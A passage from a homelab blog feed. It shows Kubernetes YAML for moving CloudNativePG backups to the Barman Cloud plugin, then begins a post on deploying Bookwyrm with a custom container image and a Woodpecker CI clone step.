</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">instances</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">imageName</span>: <span style="color:#e6db74">&#34;ghcr.io/cloudnative-pg/postgresql:17.2&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">bootstrap</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">initdb</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">database</span>: <span style="color:#ae81ff">wallabag</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">wallabag</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">200M</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">150m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">postgresql</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">parameters</span>:
</span></span><span style="display:flex;"><span>      [<span style="color:#ae81ff">...]</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">storage</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">size</span>: <span style="color:#ae81ff">1.</span><span style="color:#ae81ff">5G</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">storageClass</span>: <span style="color:#ae81ff">rbd-fast</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">backup</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">barmanObjectStore</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">endpointURL</span>: <span style="color:#ae81ff">http://my-ceph-rook-cluster:80</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">destinationPath</span>: <span style="color:#e6db74">&#34;s3://backup-cnpg/&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">s3Credentials</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">accessKeyId</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">backups-s3-secret-wallabag</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">AccessKey</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretAccessKey</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">backups-s3-secret-wallabag</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">SecretKey</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">retentionPolicy</span>: <span style="color:#e6db74">&#34;30d&#34;</span>
</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">postgresql.cnpg.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ScheduledBackup</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wallabag-pg-backup</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">method</span>: <span style="color:#ae81ff">barmanObjectStore</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">immediate</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">schedule</span>: <span style="color:#e6db74">&#34;0 30 1 * * *&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">backupOwnerReference</span>: <span style="color:#ae81ff">self</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">cluster</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wallabag-pg-cluster</span>
</span></span></code></pre></div><p>Wallabag is not something I use too much - I&rsquo;m really bad at the &ldquo;reading it later&rdquo;
part of &ldquo;Read it later&rdquo;. &#x1f926;
So it was the ideal database to start with, as I could live with it being down
for a little while, should anything go wrong.</p>
<p>As the docs state, the first step is to add the new ObjectStore object:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">barmancloud.cnpg.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ObjectStore</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wallabag-pg-store</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">retentionPolicy</span>: <span style="color:#e6db74">&#34;30d&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">configuration</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">endpointURL</span>: <span style="color:#ae81ff">http://my-ceph-rook-cluster:80</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">destinationPath</span>: <span style="color:#e6db74">&#34;s3://backup-cnpg/&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">s3Credentials</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">accessKeyId</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">backups-s3-secret-wallabag</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">AccessKey</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretAccessKey</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">backups-s3-secret-wallabag</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">SecretKey</span>
</span></span></code></pre></div><p>This is a verbatim copy of the <code>spec.backup.barmanObjectStore</code> element of the
original <code>Cluster</code> object. Plus the <code>spec.backup.retentionPolicy</code>. I then deployed
the chart, to create the ObjectStore. This doesn&rsquo;t do anything yet.</p>
<p>The next step is the reconfiguration of the Cluster. For this, I removed the
entire <code>spec.backup:</code> section, and replaced it with a <code>spec.plugins</code> section,
which looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>  <span style="color:#f92672">plugins</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">barman-cloud.cloudnative-pg.io</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">isWALArchiver</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">parameters</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">barmanObjectName</span>: <span style="color:#ae81ff">wallabag-pg-store</span>
</span></span></code></pre></div><p>Note that the <code>plugins[0].parameters.barmanObjectName</code> entry needs to be the
name of the previously created ObjectStore. Then the Helm chart can be deployed
again, and this is where the change happens. CNPG will now restart each of the
Pods for the Wallabag cluster. Each Pod will gain a new <code>plugin-barman-cloud</code>
container, which will run the backup steps from now on.</p>
<p>To verify that the backups were actually working after that, I checked the logs
for the <code>plugin-barman-cloud</code> container with <code>kubectl logs -n wallabag wallabag-pg-cluster-2 -c plugin-barman-cloud</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{<span style="color:#f92672">&#34;level&#34;</span>:<span style="color:#e6db74">&#34;info&#34;</span>,<span style="color:#f92672">&#34;ts&#34;</span>:<span style="color:#e6db74">&#34;2025-09-07T09:56:22.497125867Z&#34;</span>,<span style="color:#f92672">&#34;msg&#34;</span>:<span style="color:#e6db74">&#34;Archived WAL file&#34;</span>,<span style="color:#f92672">&#34;walName&#34;</span>:<span style="color:#e6db74">&#34;/var/lib/postgresql/data/pgdata/pg_wal/0000001A0000000200000019&#34;</span>,<span style="color:#f92672">&#34;startTime&#34;</span>:<span style="color:#e6db74">&#34;2025-09-07T09:56:14.33717675Z&#34;</span>,<span style="color:#f92672">&#34;endTime&#34;</span>:<span style="color:#e6db74">&#34;2025-09-07T09:56:22.496787018Z&#34;</span>,<span style="color:#f92672">&#34;elapsedWalTime&#34;</span>:<span style="color:#ae81ff">8.159610286</span>,<span style="color:#f92672">&#34;logging_pod&#34;</span>:<span style="color:#e6db74">&#34;wallabag-pg-cluster-2&#34;</span>}
</span></span><span style="display:flex;"><span>{<span style="color:#f92672">&#34;level&#34;</span>:<span style="color:#e6db74">&#34;info&#34;</span>,<span style="color:#f92672">&#34;ts&#34;</span>:<span style="color:#e6db74">&#34;2025-09-07T10:01:15.059185561Z&#34;</span>,<span style="color:#f92672">&#34;msg&#34;</span>:<span style="color:#e6db74">&#34;Executing barman-cloud-wal-archive&#34;</span>,<span style="color:#f92672">&#34;logging_pod&#34;</span>:<span style="color:#e6db74">&#34;wallabag-pg-cluster-2&#34;</span>,<span style="color:#f92672">&#34;walName&#34;</span>:<span style="color:#e6db74">&#34;/var/lib/postgresql/data/pgdata/pg_wal/0000001A000000020000001A&#34;</span>,<span style="color:#f92672">&#34;options&#34;</span>:[<span style="color:#e6db74">&#34;--endpoint-url&#34;</span>,<span style="color:#e6db74">&#34;http://my-ceph-rook-cluster.svc:80&#34;</span>,<span style="color:#e6db74">&#34;--cloud-provider&#34;</span>,<span style="color:#e6db74">&#34;aws-s3&#34;</span>,<span style="color:#e6db74">&#34;s3://backup-cnpg/&#34;</span>,<span style="color:#e6db74">&#34;wallabag-pg-cluster&#34;</span>,<span style="color:#e6db74">&#34;/var/lib/postgresql/data/pgdata/pg_wal/0000001A000000020000001A&#34;</span>]}
</span></span><span style="display:flex;"><span>{<span style="color:#f92672">&#34;level&#34;</span>:<span style="color:#e6db74">&#34;info&#34;</span>,<span style="color:#f92672">&#34;ts&#34;</span>:<span style="color:#e6db74">&#34;2025-09-07T10:01:23.348694147Z&#34;</span>,<span style="color:#f92672">&#34;msg&#34;</span>:<span style="color:#e6db74">&#34;Archived WAL file&#34;</span>,<span style="color:#f92672">&#34;walName&#34;</span>:<span style="color:#e6db74">&#34;/var/lib/postgresql/data/pgdata/pg_wal/0000001A000000020000001A&#34;</span>,<span style="color:#f92672">&#34;startTime&#34;</span>:<span style="color:#e6db74">&#34;2025-09-07T10:01:15.059148765Z&#34;</span>,<span style="color:#f92672">&#34;endTime&#34;</span>:<span style="color:#e6db74">&#34;2025-09-07T10:01:23.348614703Z&#34;</span>,<span style="color:#f92672">&#34;elapsedWalTime&#34;</span>:<span style="color:#ae81ff">8.289465957</span>,<span style="color:#f92672">&#34;logging_pod&#34;</span>:<span style="color:#e6db74">&#34;wallabag-pg-cluster-2&#34;</span>}
</span></span></code></pre></div><p>Once that was done, the last step was the ScheduledBackup. There were two changes
to be done:
Replacing the <code>method: barmanObjectStore</code> with <code>method: plugin</code> and adding a
<code>pluginConfiguration</code> section:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">postgresql.cnpg.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ScheduledBackup</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wallabag-pg-backup</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">method</span>: <span style="color:#ae81ff">plugin</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">immediate</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">schedule</span>: <span style="color:#e6db74">&#34;0 30 1 * * *&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">backupOwnerReference</span>: <span style="color:#ae81ff">self</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">cluster</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wallabag-pg-cluster</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">pluginConfiguration</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">barman-cloud.cloudnative-pg.io</span>
</span></span></code></pre></div><p>Then I just waited for a night to pass, to make sure that the base backups also
happened. Those I checked by looking at the <code>base/</code> paths for each cluster in
my CNPG backup bucket, for example <code>s3cmd -c ~/.s3-k8s ls -H &quot;s3://backup-cnpg/mastodon-pg-cluster/base/20250908T013024/&quot;</code>:</p>
<pre tabindex="0"><code>2025-09-08 01:34  1460   s3://backup-cnpg/mastodon-pg-cluster/base/20250908T013024/backup.info
2025-09-08 01:34     3G  s3://backup-cnpg/mastodon-pg-cluster/base/20250908T013024/data.tar
</code></pre><p>Yupp, files are there.</p>
<p>And that&rsquo;s it already. Overall, it just took a rather lazy afternoon to do it
all. Sure, I could have wished that it was a bit more automated, but eh. It was
a one-time thing, and the manual changes were not complicated, so I could do it
with at most half my brain engaged.</p>
<p>The one thing I&rsquo;m hoping for is that they might add the Barman Cloud plugin as
an optional component to the CNPG Helm chart, which would make the deployment
for the overall solution a bit easier, while still allowing users to replace
Barman with another backup solution.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Setting up Bookwyrm</title>
      <link>https://blog.mei-home.net/posts/bookwyrm-setup/</link>
      <pubDate>Sun, 31 Aug 2025 23:50:51 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/bookwyrm-setup/</guid>
      <description>Setting up Bookwyrm, translating its docker-compose setup to Kubernetes</description>
      <content:encoded><![CDATA[<p>Wherein I&rsquo;m adding <a href="https://joinbookwyrm.com">Bookwyrm</a> to my Homelab.</p>
<p>I used to read novels. A lot. On school days, I would spend the approximately
twenty minutes between the end of my morning routine and having to head off with
a novel. Ditto for lazy Sunday evenings. During my service as a conscript, I would
always find space for a book in my pack when we went on a training exercise. At
University, the most difficult decision while packing for a trip home would be
judging how many books I would need to pack to ensure I would not run out.</p>
<p>Getting my first Kindle in 2012 was a revolution. Suddenly, I didn&rsquo;t need to
think very hard anymore - I could take my entire library with me. &#x1f389;</p>
<p>But for the last couple of years, my reading has slowly dwindled. So taking a
break from my <a href="https://blog.mei-home.net/tags/series-tinkerbell/">attempts to set up Tinkerbell</a>,
I decided to set up Bookwyrm, the Fediverse alternative to Goodreads.</p>
<p>Which, in hindsight, looks a bit weird: I want to read more novels. So first thing
to do is more homelabbing. &#x1f605;</p>
<h2 id="bookwyrm">Bookwyrm</h2>
<p>So, what does Bookwyrm look like? While I called it the Fediverse Goodreads
alternative, I never actually used Goodreads. So I wasn&rsquo;t sure exactly why I
was getting myself into.</p>
<p>Here is what my home timeline looks like in Bookwyrm:
<figure>
    <img loading="lazy" src="bookwyrm-profile.png"
         alt="A screenshot of my Bookwyrm Home Timeline. At the top is a menu with Lists, Discover and &#39;Your Books&#39; entries, as well as a search field, and on the far right is a profile picture and a dropdown menu with settings. Below on the left is a carousel with my books, first those I&#39;m currently reading, then two books I&#39;ve finished reading and finally a book I&#39;m wanting to read. For each book, its cover is shown. I will go into detail on which books these are in the main post. Below the carousel are some controls for the selected book. It shows the title and a button labeled &#39;Finish reading&#39;, because the selected book is in my &#39;Currently Reading&#39; shelf. Below that are tabs for writing a review of the book, another tab for adding a general comment, and finally one for posting a quote. Below the text box for entering my review is a button for posting, next to a dropdown for choosing post visibility. In the main part of the screen is my timeline, currently filled with my own posts in chronological order. At the top, the most recent post names a book I want to read, including its title, the series it belongs to and its cover. That post has the typical options, namely replying to it, boosting it and liking it. The next one marks a post about me finishing reading a book as having been boosted by my Mastodon account. At the bottom is another carousel, headed &#39;Who to follow&#39; with a couple of proposed accounts, represented by their profile pictures."/> <figcaption>
            <p>My Home Timeline</p>
        </figcaption>
</figure>
</p>
<p>This represents Bookwyrm pretty nicely. The core function of it is socializing
about books, so all interactions are relative to books. I believe there are private
messages which can just be send to another user, but there is no generic,
Mastodon-like microblogging. All actions are related to a book. In the above
example, you can see two of my posts. The top one represents me marking
<a href="https://bookwyrm.mei-home.net/book/6070/s/the-three-body-problem">The Three-Body Problem</a>
as a book I want to read. The post below it is a boost from my Mastodon account,
where I mark <a href="https://bookwyrm.mei-home.net/book/82/s/false-gods">False Gods</a> as
finished.</p>
<p>On the left of the screenshot is the new post interface, which reinforces what
I wrote above: Bookwyrm is all about books. The new post interface is not just
a text box I can write anything in, but it is instead made up of actions related
to the selected book. For my English-speaking readers, the title roughly translates
to &ldquo;Fateful hour of a Democracy&rdquo;, it&rsquo;s a book about the history of the Weimar
Republic. That short period in German history that should be a hell of a lot more
emphasized in history lessons than what came before or after it, but sadly isn&rsquo;t.</p>
<p>Back to Bookwyrm, I can write a review of the book, including a 0-5 star score,
a general comment, or a Quote from the book. So all actions I can take relate to
the book itself.</p>
<p>Each book also gets its own page, which looks like this:
<figure>
    <img loading="lazy" src="bookwyrm-book-page.png"
         alt="A screenshot of Bookwyrm&#39;s book page for &#39;On Basilisk Station&#39; by David Weber. Below the title is the name of the series, &#39;Honor Harrington&#39;, and the number 1, indicating that it&#39;s the first book. Both the series and the Author name are highlighted to indicate they are links. On the left side, it shows the book&#39;s cover. In this case, of a woman in a military uniform, with a spaceship firing a laser beam in the background. Below that is the rating, full five stars in this case. Then comes some general information about the book, including page count (422 pages), the language, the publishing date and the ISBN. On the right, the main part of the page starts with a description of the book. At the bottom of it is a link indicating nine more editions of the book being available. Then comes a section headed &#39;You have shelved this edition in&#39;, and it shows the &#39;Read&#39; shelf. Then comes a &#39;Your reading activity&#39; section, showing that I started reading this book on August 1st 2004 and finished on August 24th. Below that, the top of new post section I described in the previous section is visible."/> <figcaption>
            <p>An example of a book page</p>
        </figcaption>
</figure>
</p>
<p>Scrolling further down shows the reviews for the book:
<figure>
    <img loading="lazy" src="bookwyrm-book-page-bottom.png"
         alt="Another Bookwyrm screenshot, this time showing the bottom of the book page. There are multiple tabs, one for &#39;Reviews&#39; and one for &#39;Your reviews&#39;. Both just have a single entry, a review from me about the book and the Honor Harrington series overall. Below the review are buttons for boosting, replying and liking."/> <figcaption>
            <p>Bottom of the book page, with a review</p>
        </figcaption>
</figure>
</p>
<p>What I find a bit sad is that it only shows the related reviews and posts, but the
automatically created post about me starting to read the book is nowhere to
be found.</p>
<p>Another problem is finding the &ldquo;instance&rdquo; of a book. Here is a screenshot of
searching for &ldquo;On Basilisk Station&rdquo; in Bookwyrm:
<figure>
    <img loading="lazy" src="book-search.png"
         alt="A screenshot of Bookwyrm&#39;s book search results for &#39;On Basilisk Station&#39;. It shows a variety of results from different Bookwyrm instances. All of them vary, in Author title, publication date, cover art, and full book title, some containing &#39;Honor Harrington&#39;, the series name, as part of the title."/> <figcaption>
            <p>Bookwyrm book search results</p>
        </figcaption>
</figure>

One of the good things here is that it got the right results, they&rsquo;re all for
the correct book. Something I haven&rsquo;t shown here was that the initial result is
only the book from my own instance, but the search can then be broadened to
other sources.
Besides Bookwyrm instances, the search also looks at other sites like Inventaire
and OpenLibrary.</p>
<p>On better federated instances than mine, the book page for the same book looks
a bit more lively:
<figure>
    <img loading="lazy" src="federated-book.png"
         alt="Another screenshot of Bookwyrm&#39;s book page for &#39;On Basilisk Station&#39;, but this time from another instance than mine. The cover art and the description of the book are different. But besides my lone review, it shows reviews by multiple other people below the book&#39;s description. In addition, at the bottom of the page, there is a list of a number of other ratings, without full reviews, from a number of users. Each shows the user&#39;s name, profile pic, their rating of the book, and the date they read it."/> <figcaption>
            <p>The page for the same book as before, but now from books.theunseen.city.</p>
        </figcaption>
</figure>

This example comes from <a href="https://books.theunseen.city/book/38651/s/on-basilisk-station">books.theunseen.city</a>.
So with more connections, the book page will fill up on my instance as well.</p>
<p>And that&rsquo;s it for the Bookwyrm tour. I still haven&rsquo;t dived deeply into it, and
I&rsquo;m currently following only one other person. But I already like it as a way
for people to follow what I&rsquo;m reading. Let&rsquo;s see what the future holds.</p>
<h2 id="deploying-bookwyrm-on-kubernetes">Deploying Bookwyrm on Kubernetes</h2>
<p>Let&rsquo;s get on with the technical part. I of course wanted to deploy Bookwyrm in
my Kubernetes cluster. But its <a href="https://docs.joinbookwyrm.com/install-prod.html">default docs</a>
are geared towards deployment with docker-compose. And the instructions contain
some &ldquo;please run this script&hellip;&rdquo; which I had to integrate into my setup, to
ensure that I didn&rsquo;t have to rely on documenting the commands somewhere.</p>
<p>But the first step had to be to create a container image, as the Bookwyrm
project itself does not supply one.</p>
<h3 id="image-creation">Image creation</h3>
<p>I took the container build instructions from the <a href="https://github.com/bookwyrm-social/bookwyrm/blob/v0.7.5/Dockerfile">official Dockerfile</a>
and added the image to my CI. In the process, I completely remade my container
image build setup, see <a href="https://blog.mei-home.net/posts/improving-container-image-build-perf-with-buildah/">this post</a>
if you&rsquo;re interested.</p>
<p>The ultimate version of the image build looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-Dockerfile" data-lang="Dockerfile"><span style="display:flex;"><span><span style="color:#66d9ef">ARG</span> python_ver<span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span><span style="color:#66d9ef">FROM</span><span style="color:#e6db74"> python:${python_ver}</span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span><span style="color:#66d9ef">ENV</span> PYTHONUNBUFFERED <span style="color:#ae81ff">1</span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span><span style="color:#66d9ef">RUN</span> mkdir /app /app/static /app/images<span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span><span style="color:#66d9ef">WORKDIR</span><span style="color:#e6db74"> /app</span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span><span style="color:#66d9ef">RUN</span> apt-get update <span style="color:#f92672">&amp;&amp;</span> apt-get install -y gettext libgettextpo-dev tidy libsass-dev <span style="color:#f92672">&amp;&amp;</span> apt-get clean<span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span><span style="color:#66d9ef">COPY</span> . /app<span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span><span style="color:#66d9ef">RUN</span> env SYSTEM_SASS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;true&#34;</span> pip install -r requirements.txt --no-cache-dir<span style="color:#960050;background-color:#1e0010">
</span></span></span></code></pre></div><p>I made two important changes compared to the official Dockerfile. First, the
official docker-compose deployment just mounts the Bookwyrm source code into
the image to make it available. I wanted the image to be self-contained, so
instead of only copying the <code>requirements.txt</code> file, I copied the entire
source code into the <code>/app</code> directory.</p>
<p>Another change is the addition of <code>libsass-dev</code> to the installed packages, and
adding the <code>SYSTEM_PASS=&quot;true&quot;</code> variable to the <code>pip</code> invocation installing the
dependencies. I found this to be required due to the arm64 image build. During
the amd64 build, a full wheel is available for the <code>libass</code> package. But no
wheel seems to be available for arm64, and so the C++ libsass is getting
build as part of the <code>pip</code> invocation. This takes quite a while on a Pi4,
especially as it looks like the compile is only using one core. The builds looked
like this:</p>
<p><figure>
    <img loading="lazy" src="image-build-time.png"
         alt="A screenshot of Woodpecker&#39;s pipeline overview. It shows a Bookwyrm image build, running for a total of 23 minutes. It has two build steps, one for amd64 and one for arm64. The amd64 image took 05:23 minutes, while the arm64 build of the same image took 17:30."/> <figcaption>
            <p>Image build for Bookwyrm without the system libsass.</p>
        </figcaption>
</figure>

The arm64 build took pretty much 3x as long as the amd64 build. Sure, some of it
can be attributed to the arm64 builds being run on Raspberry Pi 4. But the main
contributing factor was the fact that libsass needed to be rebuild for arm64,
but not for amd64.
After I started using the system libsass, This is what the build times look
like:
<figure>
    <img loading="lazy" src="image-build-sys-libsass.png"
         alt="Another screenshot of Woodpecker&#39;s pipeline overview. It again shows the Bookwyrm image build, but while the amd64 build still takes a comparable 5:40 minutes, the arm64 build now only takes 10:38 minutes. Still a lot longer, but no longer quite as bad."/> <figcaption>
            <p>Some improvements of the image build times after I started using the system libsass instead of letting pip build it.</p>
        </figcaption>
</figure>

Good enough for now.</p>
<p>But there was one issue remaining: As you can see, I&rsquo;m copying the Bookwyrm code
into the image. But I had to get that code from somewhere first, and I wanted
to have it in my Homelab, instead of fetching it from GitHub every time. So
I created a mirror on my Forgejo instance. That brought a new question: How to
fetch that repo from Forgejo from within a Woodpecker job? I could certainly have
made it a public repo and just fetched it, but I figured I would try to do it
properly and fetch it with credentials.</p>
<p>But where to get the credentials from? I didn&rsquo;t want to manually add them to the
repo config in Woodpecker, because I figured that Woodpecker already had the
credentials, because it had to fetch the container image repo where I put the
Containerfile for the Bookwyrm image. Reading up a bit, I found the
<a href="https://woodpecker-ci.org/docs/usage/environment#built-in-environment-variables">environment variable docs for Woodpecker</a>.
These contain the <code>CI_NETRC_USERNAME</code> and <code>CI_NETRC_PASSWORD</code> variables. These
are set to the credentials needed to fetch from the git forge configured for
the repository in Woodpecker. Note that the docs say this:</p>
<blockquote>
<p>Credentials for private repos to be able to clone data. (Only available for specific images)</p></blockquote>
<p>Sadly, it doesn&rsquo;t say which images get a netrc file with the credentials mounted.
I found more docs <a href="https://woodpecker-ci.org/docs/usage/project-settings#custom-trusted-clone-plugins">here</a>,
mentioning trusted clone plugins. I tried to build a small Alpine image with
git installed, but still didn&rsquo;t manage to get the credentials into that image.
The error massage always read:</p>
<pre tabindex="0"><code>fatal: could not read Username for &#39;https://forgejo.example.com&#39;: No such device or address
</code></pre><p>I then dug through the code and tried to find the check, to see what was wrong
with my new Alpine image, why it didn&rsquo;t get the netrc credentials. I found
<a href="https://github.com/woodpecker-ci/woodpecker/blob/e8beddeb36e5e14bd836d5084dbd49ef10a8a768/pipeline/frontend/yaml/types/container.go#L130">this function</a>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-go" data-lang="go"><span style="display:flex;"><span><span style="color:#66d9ef">func</span> (<span style="color:#a6e22e">c</span> <span style="color:#f92672">*</span><span style="color:#a6e22e">Container</span>) <span style="color:#a6e22e">IsTrustedCloneImage</span>(<span style="color:#a6e22e">trustedClonePlugins</span> []<span style="color:#66d9ef">string</span>) <span style="color:#66d9ef">bool</span> {
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">return</span> <span style="color:#a6e22e">c</span>.<span style="color:#a6e22e">IsPlugin</span>() <span style="color:#f92672">&amp;&amp;</span> <span style="color:#a6e22e">utils</span>.<span style="color:#a6e22e">MatchImageDynamic</span>(<span style="color:#a6e22e">c</span>.<span style="color:#a6e22e">Image</span>, <span style="color:#a6e22e">trustedClonePlugins</span><span style="color:#f92672">...</span>)
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Note that it doesn&rsquo;t just check the image, but also verifies that the step is
a plugin, not just an image executing commands. Instead of building a plugin,
I decided to try to work with the official clone plugin, which is also used to
clone the initial repository for a Woodpecker pipeline run. This ultimately
worked, and the step for fetching the Bookwyrm repo mirror from my Forgejo
looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">clone bookwyrm repo</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">woodpeckerci/plugin-git</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">settings</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">depth</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">branch</span>: <span style="color:#ae81ff">production</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">partial</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">remote</span>: <span style="color:#ae81ff">https://forgejo.example.com/mirrors/bookwyrm.git</span>
